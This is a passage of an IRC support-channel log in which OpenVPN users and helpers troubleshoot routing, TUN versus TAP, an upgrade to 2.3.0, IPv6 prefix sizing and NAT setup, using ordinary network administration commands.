Oh, I guess --ip-win32 is worthless for you (that's only interesting if using ifconfig to se the IP, otherwise it won't help) 12:08 < Lord-M> nope, sadly doesn't make a difference... The "route 0.0.0.0 0.0.0.0" statement gets executed before delay (both route-delay, or tap-sleep) 12:08 < Lord-M> when I change the statement in "route 0.0.0.0 0.0.0.0 192.168.x.x" it takes the delay into account :| 12:09 <+pekster> The only other interesting Windows-specific option that might do some good would be --dhcp-renew to get it to "re-renew" in case something got messed up the first time it did a DHCP DISCOVER call 12:10 < Lord-M> tried that, also doesn't work (did work with 2.2.2 though) 12:10 <+pekster> I'm not really feeling great about that fixing things (the docs seem to suggest it's not useful when you already get a normal discovery process) 12:10 <+pekster> Ugh 12:10 < Lord-M> what does solve the problem is "redirect-gateway" 12:11 < Lord-M> both that completely kills the existing gateway (which is not what I'm after) 12:11 < Lord-M> that again is solved by doing a full "ipconfig /refresh" after OpenVPN gets connected (so my previous default gateway is restorted *and* that TAP adapter hangs on to its own default gateway) 12:11 < Lord-M> but that is problematic as it gets screwed up again if OpenVPN reconnects at some point... 12:12 < Lord-M> *both = but 12:12 <+pekster> I suppose you need tap verses a tun setup if you're going through all this trouble? 12:12 <+pekster> tun makes things a lot cleaner :P 12:13 < Lord-M> honestly never tried ;) TAP always worked for me, but I'll have a look at a TUN setup... Will that still work with bridging, etc? 12:13 <+pekster> No, it's a routed setup, not bridged 12:14 <+pekster> And because of that it's a lot less moving parts to break (plus less wasted bandwidth) 12:14 <+pekster> !tunortap 12:14 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 12:14 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 12:14 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:14 <+pekster> Really, unless you are actually transmitting Ethernet frames or require real broadcast support, you don't want/need tap 12:14 < Lord-M> ok 12:15 < Lord-M> and basically the only change is that I need OpenVPN to push a couple of routes through to the client? 12:15 <+pekster> Yea, and your server-side network to be made aware how to route back to the VPN LAN 12:15 <+pekster> In a corporate environment you just add routes to the corporate routers to send traffic to the VPN server 12:16 < Lord-M> kk... I think I've done this before (running DD-WRT) 12:16 < Lord-M> perhaps a (final) stupid question: But what would I need real broadcast support for? 12:16 <+pekster> Multicast, or some programs (eg: games doing a LAN broadcast to find other game hosts on the network) 12:17 < Lord-M> ok, well then, I'll give the TUN setup a try... Thanks a lot! 12:17 <+pekster> Some "auto-discovery" protocols like to use broadcasts to announce themselves (eg: uPnP) 12:17 <+pekster> Yup. Most people don't need broadcast support, or have ways around them for VPN users 12:18 <+pekster> Good luck, and despite the effort switching your working 2.2.x setup over, I suspect you'll be happier in the end with a less complex setup 12:18 < Lord-M> I'm basically using it for some SMB shares, so that shouldn't be a problem 12:22 -!- Orbi [~opera@109.129.27.94] has quit [Ping timeout: 248 seconds] 12:25 -!- Orbi [~opera@anon-149-10.vpn.ipredator.se] has joined #openvpn 12:28 -!- Lord-M [~LordM@ip-80-113-202-148.ip.prioritytelecom.net] has quit [Quit: Cheers!] 12:29 -!- Orbi [~opera@anon-149-10.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 12:39 -!- Orbi [~opera@anon-185-46.vpn.ipredator.se] has joined #openvpn 13:12 < Orbi> I'm getting this error 6 times after "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97) 13:12 < Orbi> What does it mean? 13:17 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:17 < WhoNeedszzz> Hey guys 13:17 < WhoNeedszzz> I just updated to 2.3.0 and now i'm getting this on my client: "Authenticate/Decrypt packet error: packet HMAC authentication failed" 13:17 < WhoNeedszzz> I haven't changed anything since running 2.3 rc2 13:18 < WhoNeedszzz> Is there a config difference? 13:19 -!- grimeton [~ruth@2a01:4f8:d12:c45:0:dead:beef:cafe] has joined #openvpn 13:19 < grimeton> is it possible to tell the daemon to use a different destination address on an udp tunnel without reestablishing the connection? 13:24 <+pekster> grimeton: See --float in the manpage, although that only works if one end moves to a new source IP that the other peer can see 13:28 < WhoNeedszzz> here's my server and client configs: https://gist.github.com/eb730f60b24bea9b408a 13:28 <@vpnHelper> Title: gist:eb730f60b24bea9b408a (at gist.github.com) 13:28 < WhoNeedszzz> Everything worked with 2.3 rc2 13:31 < WhoNeedszzz> Anyone? 13:34 < grimeton> pekster: yeah, i know, that's NOT what i want 13:44 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 246 seconds] 13:49 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:50 < WhoNeedszzz> Sorry net messed up. Did anyone respond? 13:50 < Orbi> @WhoNeedszzz not yet 13:52 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has joined #openvpn 13:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 244 seconds] 13:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:55 < WhoNeedszzz> I feel like it's a config change 13:55 < WhoNeedszzz> But i don't see any documentation for 2.3.9 13:55 < WhoNeedszzz> 2.3.0* 13:57 < Orbi> open your 2.3 rc2 and 2.3.0 configs in notepad++ and compare them for differences 14:00 < WhoNeedszzz> there is only one config 14:00 < WhoNeedszzz> I didn't change anything from 2.3 rc2 14:01 < WhoNeedszzz> Other than now adding tls-server and tls-client 14:01 < WhoNeedszzz> i'm saying are there differences that 2.3.0 expects that i'm not aware of 14:02 < WhoNeedszzz> i just wish i knew what route line it is referring to 14:03 < WhoNeedszzz> Perhaps this? /usr/sbin/ip route add 72.14.183.109/32 via 192.168.1.1 14:03 < WhoNeedszzz> Should it be /32? 14:08 -!- Orbi [~opera@anon-185-46.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 14:13 -!- mattock_afk is now known as mattock 14:15 < plaisthos> WhoNeedszzz: there should not be any difference between rc2 and final in that area of code 14:16 -!- Orbi [~opera@109.129.44.7] has joined #openvpn 14:17 < plaisthos> there only two changes in rc2 to final, one does not affect linux and the other is related to push messages 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 260 seconds] 14:20 -!- WhoNeedszzz [~WhoNeedsz@adsl-074-170-159-249.sip.msy.bellsouth.net] has joined #openvpn 14:20 -!- WhoNeedszzz [~WhoNeedsz@adsl-074-170-159-249.sip.msy.bellsouth.net] has quit [Changing host] 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Client Quit] 14:21 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:21 < WhoNeedszzz> so i'm curious then what's wrong 14:21 < WhoNeedszzz> if there aren't many changes 14:21 < WhoNeedszzz> since it worked fine in rc2 14:22 < plaisthos> it must be something different than rc2 vs final 14:22 < WhoNeedszzz> well i didn't change anything else 14:22 < WhoNeedszzz> the route also fails in windows if that helps 14:23 < WhoNeedszzz> did you look at my config i pasted earlier? 14:23 < plaisthos> route failure is also different from hmac fail 14:23 < WhoNeedszzz> i fixed the hmac issue 14:23 < WhoNeedszzz> just needed to add tls-server in server config and tls-client in client config 14:25 < WhoNeedszzz> It's definitely this line: ip route add 72.14.183.109/32 via 192.168.1.1 14:25 < plaisthos> WhoNeedszzz: on the client? 14:25 < WhoNeedszzz> yes 14:25 < WhoNeedszzz> if i enter the command manually i get: RTNETLINK answers: File exists 14:25 < plaisthos> what is the error? 14:25 < plaisthos> are you running two instances of openvpn? 14:25 < WhoNeedszzz> no 14:26 < plaisthos> who does your routing table look (netstat -rn), is tehre already that route? 14:26 < WhoNeedszzz> hmm it is there 14:26 < WhoNeedszzz> odd 14:26 < WhoNeedszzz> so just delete it? 14:26 < plaisthos> yes 14:27 < plaisthos> may be a leftover from a previous try 14:29 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 14:29 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:30 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:30 < WhoNeedszzz> ok progress 14:30 < WhoNeedszzz> now no route error 14:30 < WhoNeedszzz> but i'm getting "ROUTE6: default_gateway=UNDEF" in client output 14:30 < plaisthos> WhoNeedszzz: sure :_ 14:31 < plaisthos> you don't use server-ipv6 14:31 < plaisthos> (or all options set by server-ipv6) 14:31 < plaisthos> or whatever the option is called 14:31 < WhoNeedszzz> hmm well when i use server-ipv6 the pool is configured wrong 14:32 < WhoNeedszzz> i didn't use server-ipv6 in rc2 and it worked fine 14:32 < thermoman> who to contact to get something added to the FAQ? (http://openvpn.net/index.php/open-source/faq/79-client/317-qmulti-bad-source-address-from-client--packet-droppedq-or-qget-inst-by-virt-failedq.html) 14:32 <@vpnHelper> Title: "MULTI: bad source address from client , packet dropped" or "GET INST BY VIRT: [failed]"? (at openvpn.net) 14:33 -!- Orbi [~opera@109.129.44.7] has quit [Ping timeout: 248 seconds] 14:35 < WhoNeedszzz> yeah it messes up the pool 14:35 < plaisthos> WhoNeedszzz: care to report the bug? 14:35 < WhoNeedszzz> it should be :7100, but it picks :8000 which is out of my range of addresses 14:35 < WhoNeedszzz> well it could be anywhere from :7000 to :7FFF 14:36 < WhoNeedszzz> but not :8000 14:36 < WhoNeedszzz> what line sets up the ipv6 gateway? 14:36 -!- Orbi [~opera@anon-149-72.vpn.ipredator.se] has joined #openvpn 14:37 < Orbi> any clues as to these errors: "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97) ? 14:38 < plaisthos> WhoNeedszzz: ifconfig6 line 14:38 < plaisthos> being pushed by the server 14:38 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 14:38 <+pekster> WhoNeedszzz: IIRC, you can't use OpenVPN with anything smaller than a /112 14:39 <+pekster> You should be allocated at *least* a /64 from any upstream provider 14:39 <+pekster> At least, any provider worth using 14:40 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 14:40 < WhoNeedszzz> i do have a /64 14:40 < WhoNeedszzz> 2600:3c00::21:7000/64 - 2600:3c00::21:7fff/64 14:40 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 14:41 <@ecrist> that looks like a /56 to me 14:41 < WhoNeedszzz> 2600:3c00 is linode 14:41 <+pekster> ecrist: that "range" he gave is both in the "same" /64 14:41 < plaisthos> ecrist: nah 14:41 <+pekster> Scrape off the bogus CIDR mask that I don't think he means and that's actually a /116 14:42 <+pekster> NOT a /112 14:42 <+pekster> ovpn can't with with a /116 14:42 < WhoNeedszzz> i'm pulling the info straight from my server's dashboard 14:42 < plaisthos> WhoNeedszzz: you need server-ipv6 to push the ifconfig and gateway to client iirc 14:42 < WhoNeedszzz> /64 14:42 <+pekster> WhoNeedszzz: You don't seem to understand how a /64 works. You'd get 2600:3c00:0:0:0:0:0:0 through 2600:3c00:0::ffff:ffff:ffff:ffff 14:42 <+pekster> That is a /64 14:42 <+pekster> Anything less than that range is not a /64 14:43 <+pekster> Sorry, missed a 0 in the 2nd output 14:43 <@ecrist> sorry, guys, I missed the short notation :: 14:43 * ecrist flogs himself appropriately 14:43 < plaisthos> I don't think that configuration ever worked 14:43 <+pekster> ecrist: np. ipv6 gets long (one of the obvious drawbacks) 14:43 < WhoNeedszzz> the range is 4096 addresses 14:43 < WhoNeedszzz> Surely that is enough 14:43 <@ecrist> WhoNeedszzz: you're fine 14:43 <+pekster> But he doesn't have a /112? 14:43 < WhoNeedszzz> so it looks like i need --route-ipv6 14:44 <+pekster> ecrist: Does 2.3.0 final support arbitrary CIDR masks? I'm still somehwat new to IPv6 support in ovpn, so maybe my info is old? 14:44 < plaisthos> pekster: it needs more than /112 14:44 <+pekster> If he really only has 2600:3c00::21:7000/116, can that be expressed? 14:44 <@ecrist> I'm not sure, pekster 14:44 < plaisthos> right 14:44 <@ecrist> I've only used it with a /64 14:45 < plaisthos> but I don't think he has only /112 14:45 <+pekster> Okay; he's described a /116 network. There's the "probloem" for getting a 2600:3c00::21:8xxx address 14:45 <+pekster> He's complaining that getting the .... :8xxx is the issue 14:45 < WhoNeedszzz> right 14:45 <+pekster> THat is *part* of a /112 14:45 < WhoNeedszzz> setting ipv6-pool manually works 14:45 < plaisthos> WhoNeedszzz: shouldn't 14:45 <+pekster> How do you not have that address if you have the *entire* /64 as you claim? 14:45 < plaisthos> what are you setting? 14:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 14:46 < WhoNeedszzz> look at my config pasted 14:46 < plaisthos> WhoNeedszzz: ipv6-pool also add 0x1000 to the address 14:46 < WhoNeedszzz> that's what i did 14:46 < plaisthos> WhoNeedszzz: there is only xxxx 14:47 < plaisthos> no idea what /xx you specified 14:47 < WhoNeedszzz> here's my line: ifconfig-ipv6-pool 2600:3c00::21:7100 14:47 < WhoNeedszzz> that works 14:47 < WhoNeedszzz> it doesn't add 14:48 < WhoNeedszzz> what should route-ipv6 be? 14:48 < plaisthos> WhoNeedszzz: yes 14:48 -!- Orbi [~opera@anon-149-72.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 14:48 < plaisthos> it default to /64 14:48 < plaisthos> WhoNeedszzz: why do you assume that it does not add? 14:48 < WhoNeedszzz> because i looked at the output 14:48 < WhoNeedszzz> the address gets allocated properly 14:48 < WhoNeedszzz> i just need the route 14:48 < ngharo> WhoNeedszzz: here's my relavant bits for my working 2.3 ipv6 setup http://paste.debian.net/224676/ 14:48 < plaisthos> hm 14:49 < plaisthos> you seem to be right 14:49 < ngharo> i have 2001:1af8:4400:a049::/64 assigned to me 14:49 < plaisthos> misread the code 14:49 < ngharo> WhoNeedszzz: didn't we get this working before? :) 14:49 < WhoNeedszzz> we did 14:49 -!- Orbi [~opera@anon-184-62.vpn.ipredator.se] has joined #openvpn 14:49 < WhoNeedszzz> it doesn't work in 2.3.0 14:49 < WhoNeedszzz> and i didn't change anything 14:50 < WhoNeedszzz> but right i forgot i already have the push route-ipv6 14:50 < WhoNeedszzz> so why isn't the client getting it? 14:50 < WhoNeedszzz> what does the bypass-dhcp part do? 14:50 < WhoNeedszzz> that's the only difference in our configs other than the manual allocating 14:51 < plaisthos> WhoNeedszzz: ngharo has also 112 14:52 < ngharo> can you repaste with your addresses shown 14:54 <@ecrist> !secret 14:54 <@vpnHelper> "secret" is funny that people use free programs, consult free help for them, run a business with them, but are restricted to say what they do. 14:54 <@ecrist> !topsecret 14:54 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 14:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Quit: Leaving] 14:55 < ngharo> :) 14:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:55 < WhoNeedszzz> sorry was testing vpn 14:55 < ngharo> ecrist: do you know where the windows NSI script is located in the source? 14:55 < WhoNeedszzz> ngharo, https://gist.github.com/853705caa977dc6a5a72 14:55 <@vpnHelper> Title: gist:853705caa977dc6a5a72 (at gist.github.com) 14:55 < WhoNeedszzz> which is what i had with rc2, but added tls-server and tls-client 14:56 < WhoNeedszzz> that config worked in rc3 14:56 < WhoNeedszzz> rc2* 14:56 <+pekster> Actually, I'm curious about the NSI location too, since I've been meaning to get around to submitting a patch to fix the awful lack of addtap.bat and deltapall.bat (I've had 3 people with issues becuase of that here, and that's the folks I've been able to help and seen) 14:57 < ngharo> I've got a couple people looking into building the visual studio project 14:57 < ngharo> but they're lazy hackers like myself :) 14:57 < ngharo> i highly doubt it'll spit out the NSI but who knows 14:57 <@ecrist> ngharo: no I do not, sorry 14:57 <+pekster> Well, the NSI "should" be provided since it's part of the installation of GPL software :\ 14:58 < ngharo> pekster: maybe we can create one 14:58 < ngharo> shouldnt be too difficult 14:58 <+pekster> It seems silly to me to take a GPL project and "hide" it behind a non-copyleft installer >:| 14:58 < ngharo> but i agree 14:58 <@ecrist> we're not "hiding" anything 14:58 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 14:59 < plaisthos> WhoNeedszzz: you configured a /64 pool and a /64 server address 14:59 < plaisthos> this is the default 14:59 < WhoNeedszzz> ngharo, i have to run to class, but i'll keep this on to see what is said 14:59 < WhoNeedszzz> thanks for the help 14:59 < WhoNeedszzz> i'll be back on later 14:59 < plaisthos> if you do not own the /64 this config is wrong too .... 15:00 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 15:00 < WhoNeedszzz> i said the range i have 15:00 < WhoNeedszzz> i don't understand /64 /112 /blash 15:00 <+pekster> You used a /64 CIDR mask and described a /116 15:00 < WhoNeedszzz> /blah* 15:00 <+pekster> That's a huge difference 15:01 < plaisthos> WhoNeedszzz: then you should read a basic ipv6 whatever tutorial 15:01 < plaisthos> what /xx is 15:01 <+pekster> (of millions and millions of IPs) 15:01 < WhoNeedszzz> here's what my host says: Public IP Pools 2600:3c00::21:7000/64 - 2600:3c00::21:7fff/64 (4096 addresses) 15:01 < plaisthos> WhoNeedszzz: that is bullshit 15:01 < plaisthos> sorry but that makes no sense 15:01 < ngharo> most hosts don't know IPv6 themselves I found 15:02 < plaisthos> the range you posted 15:02 < WhoNeedszzz> so what is 2600:3c00::21:7000/64 2600:3c00::21:7000:0:0:0:0? 15:02 < plaisthos> what would make is 2600:3c00:21:7000::/64 - 2600:3c00:21:7fff::/64 15:02 < plaisthos> WhoNeedszzz: nothing that makes any sense 15:03 < WhoNeedszzz> all i know is rc2 worked fine 15:03 < WhoNeedszzz> so it's clearly something wrong with 2.3.0 15:03 < WhoNeedszzz> nothing else has changed on my part 15:03 < WhoNeedszzz> but now i'm really late 15:04 <+pekster> A /52 is a little odd for a provider to hand out since they tend to stick with nibble boundries (usually) 15:04 < plaisthos> yeah 15:04 <+pekster> I mean, technically you can do it... 15:04 <+pekster> They might actually be trying to "offer" a /116 or something really dumb, but then they need to be shot 15:05 <+pekster> And stop calling it a /64 :P 15:05 < ngharo> my host said "heres your /64, it has 65535 IPs" 15:06 < ngharo> lol k 15:06 < plaisthos> WhoNeedszzz: please before coming here time. a) learn about Ipv6 and cidr b) get the correct range from provider you have and c) between 2.3rc2 and 2.3.0 there is nothing that affects you (I know the code changes, so don't tell me there is a difference) 15:07 < WhoNeedszzz> then explain why it worked in rc2 and not now 15:07 < plaisthos> WhoNeedszzz: see c) 15:07 < WhoNeedszzz> that doesn't explain 15:08 < WhoNeedszzz> that contradicts 15:08 < plaisthos> yes 15:08 < ngharo> can you ping6 to the vpn endpoint? 15:08 < WhoNeedszzz> which my experience is saying otherwise 15:08 < ngharo> what is your problem anyways, just won't route out to the internet? 15:08 < WhoNeedszzz> i can ping both client and server 15:08 < WhoNeedszzz> just nothing else 15:08 < WhoNeedszzz> both directions 15:08 < ngharo> your problem is likely outside of openvpn 15:08 < WhoNeedszzz> that wouldn't make sense 15:08 < ngharo> are you still running npd? 15:08 < WhoNeedszzz> as i said, i didn't change anything on my system since 15:09 < ngharo> tcpdump your inet interface, look for icmpv6 packets 15:09 < plaisthos> WhoNeedszzz: the changes between 2.3rc2 and 2.3.0 are *extremely* unlikely to change *anyones* setup 15:09 < ngharo> likely the router is asking WHO HAS xx:xx:xx:xx::x 15:09 < WhoNeedszzz> ah yeah npd6 wasn't running 15:10 < WhoNeedszzz> i didn't know i needed it 15:10 < ngharo> there ya go 15:10 < plaisthos> WhoNeedszzz: ndp6 does not work with /116 :D 15:10 < WhoNeedszzz> ok super late now thanks 15:11 -!- dazo_afk is now known as dazo 15:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 15:13 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 15:15 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 15:15 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 15:18 <+pekster> ngharo: This doc appears out of data re: NSIS, because it references a '\win\openvpn.nsi' script that I can't find anywhere in the 2.3.0 sources :\ 15:18 <+pekster> Nor the make_dist.py 15:18 <+pekster> ngharo: Oh, missed the link: https://community.openvpn.net/openvpn/wiki/BuildingOnWindows 15:18 <@vpnHelper> Title: BuildingOnWindows – OpenVPN Community (at community.openvpn.net) 15:21 < plaisthos> someone just aked me if it is possible to run a OpenVPN server on a Android telephone 15:21 * plaisthos really wonders what the use case is 15:21 <+pekster> Bridge it to an office wifi and accept connections from 3G for spy situations ;) 15:24 < plaisthos> pekster: :D 15:24 -!- nutron|w [~nutron@24.67.96.21] has joined #openvpn 15:24 <+pekster> "My name is Michael Westen, and I hacked OpenVPN to run as a service on my cell phone." 15:38 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 15:44 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 244 seconds] 15:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:01 -!- raidz is now known as raidz_away 16:01 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: ZNC - http://znc.in] 16:04 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 16:10 -!- raidz_away is now known as raidz 16:20 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 16:28 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:36 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 16:48 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 17:06 -!- grimeton [~ruth@2a01:4f8:d12:c45:0:dead:beef:cafe] has left #openvpn [] 17:20 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:22 -!- Orbi [~opera@anon-184-62.vpn.ipredator.se] has quit [Quit: Orbi] 17:23 <@dazo> pekster: we've split out everything which is not strictly the cross platform stuff in OpenVPN into separate projects ... which includes easy-rsa, windows TAP driver and windows installer 17:23 -!- nutron|w [~nutron@24.67.96.21] has quit [Changing host] 17:23 -!- nutron|w [~nutron@unaffiliated/nutron] has joined #openvpn 17:23 <@dazo> (we even now got a better cross-platform build tool ... so you can more easily build windows binaries directly from Linux) 17:25 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:28 -!- dazo is now known as dazo_afk 18:00 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 18:18 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 18:19 < WhoNeedszzz> so yeah it turns out i do only have a /116 18:21 <+hazardous> what the hell 18:21 <+hazardous> who the fuck issues /116's 18:22 < WhoNeedszzz> Linode 18:22 < WhoNeedszzz> My question is who has the resources to issue /64s? 18:30 <+hazardous> anyone with a /48 which is standard 18:33 < WhoNeedszzz> ok so still not working with npd6 running 18:33 < WhoNeedszzz> ngharo, you here? 18:34 < WhoNeedszzz> ok apparently they will give a /64 upon request 18:34 < WhoNeedszzz> most people don't need a /64 18:34 < WhoNeedszzz> hell i wouldn't ever use 4096 addresses for a /116 18:40 < WhoNeedszzz> woo now i have 2600:3c00:e000:0016::/64 18:44 <+hazardous> 16:22:36 < WhoNeedszzz> My question is who has the resources to issue /64s? 18:44 <+hazardous> i can issue like, a few million /64's from my home allocation.. 18:44 <+hazardous> idgi 18:44 <+hazardous> ipv6 isn't really something to conserve 18:44 < WhoNeedszzz> ah see that shows how little i know about ipv6 18:44 < WhoNeedszzz> i know there are a ton of possible addresses 18:45 <+hazardous> iirc every atom in the universe can have an address or something equally inane 18:45 < WhoNeedszzz> but it seems wasteful to allocate entire /64 blocks 18:51 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 18:51 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 18:51 < WhoNeedszzz> Ok now i'm getting "MULTI: bad source address from client [192.168.1.9], packet dropped 18:56 -!- DaCheat_ [JMark@external.JmarkIT.com] has joined #openvpn 18:56 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 18:59 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 19:03 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Disconnected by services] 19:03 -!- medum_ [kevin@n2l.org] has joined #openvpn 19:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 19:04 -!- Netsplit *.net <-> *.split quits: meepmeep, emmanuelux, medum, DaCheat, mnathani 19:04 -!- Netsplit over, joins: meepmeep 19:11 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 264 seconds] 19:11 -!- Netsplit *.net <-> *.split quits: meepmeep 19:11 -!- Netsplit over, joins: meepmeep 19:11 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:11 < WhoNeedszzz> Sorry vpn disconnected irc. Did anyone respond? 19:11 < ngharo> !source 19:11 <@vpnHelper> My source is at http://supybot.com/ 19:11 < ngharo> !git 19:11 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git 19:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 19:13 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 19:14 < WhoNeedszzz> ngharo, can you help me? 19:14 < ngharo> i suppose :v 19:14 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 19:15 < swiftkey> /join #openvpn-as 19:15 < swiftkey> /join #openvpn-as 19:15 < swiftkey> hmm 19:15 < swiftkey> hello there 19:16 < ngharo> WhoNeedszzz: whats your eth0 ipv6 addr? 19:17 < ngharo> or rather paste 'ip -6 a' and server config 19:17 < ngharo> brb poopin :> 19:19 < WhoNeedszzz> ngharo, https://gist.github.com/a75ccae32417abe46354 19:19 <@vpnHelper> Title: gist:a75ccae32417abe46354 (at gist.github.com) 19:19 -!- rabidsnail [~rabidsnai@unaffiliated/cmdrbatguano] has joined #openvpn 19:19 -!- savagecroc [~grahamsav@207.204.241.202] has joined #openvpn 19:20 < savagecroc> how do i exclude traffic to a particular IP from going over the VPN? 19:21 < rabidsnail> (in Linux) add a route specifically for that IP that goes over some other interface 19:21 < swiftkey> im new to vpn 19:21 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.] 19:23 < swiftkey> http://pastie.org/5686111 does this mean that my vpn is ok ? 19:23 -!- savagecroc [~grahamsav@207.204.241.202] has quit [Read error: Connection reset by peer] 19:23 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 19:23 < rabidsnail> savagecroc: man route, look at the examples 19:23 < swiftkey> but i cannot connect to the internet if i get connected to my vpn 19:24 < swiftkey> i already set /etc/resolv.conf to 8.8.8.8 19:27 < swiftkey> http://pastie.org/5686111 does this mean that my vpn is ok ? 19:27 < swiftkey> but i cannot connect to the internet if i get connected to my vpn 19:27 < swiftkey> i already set /etc/resolv.conf to 8.8.8.8 19:29 < ngharo> !linnat 19:29 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 19:29 < ngharo> !1918 19:29 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 19:29 < ngharo> swiftkey: read those 19:30 < ngharo> you should not be using 192.160 19:30 < ngharo> fix that, then configure a NAT 19:31 -!- savagecroc [~grahamsav@207.204.241.202] has joined #openvpn 19:31 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 19:31 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 19:31 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 19:31 < savagecroc> ah found out the command 19:31 < savagecroc> route youku.com 255.255.255.0 net_gateway << very nice 19:31 < swiftkey> im not using 192.160 19:31 < swiftkey> its 192.168. 19:32 < swiftkey> hmm let me check 19:32 < 